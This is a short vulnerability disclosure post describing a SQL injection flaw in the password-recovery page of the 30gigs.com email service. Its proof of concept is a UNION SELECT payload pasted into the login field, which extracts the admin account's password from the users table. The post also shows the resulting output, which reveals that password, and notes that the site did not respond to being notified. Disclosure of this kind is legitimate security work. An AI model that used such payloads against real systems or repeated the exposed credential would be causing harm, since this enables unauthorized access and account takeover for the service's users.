I found a sql injection vulnerability, which leads to password disclosure in <a href="http://30gigs.com">30gigs.com</a> email service.<br>
The vulnerability exists in <a href="http://www.30gigs.com/getpassword/">http://www.30gigs.com/getpassword/</a> page due to lack of validation of user submitted data.<br>
Proof of Concept:<br>
enter <a href="http://www.30gigs.com/getpassword/">http://www.30gigs.com/getpassword/</a><br>
and copy &amp; paster this code in the Login field, finally submit the form.<br>
<br>
not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin<br>
<br>
it will give an output like below, in which &quot;runsit&quot; corresponds to the password of account &quot;admin&quot;<br>
We have sent the password for your not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='<a href="mailto:admin@30gigs.com">admin@30gigs.com</a> account to runsit<br>
<br>
The site has been notified about the vulnerability 2 weeks ago, but no response was taken.<br>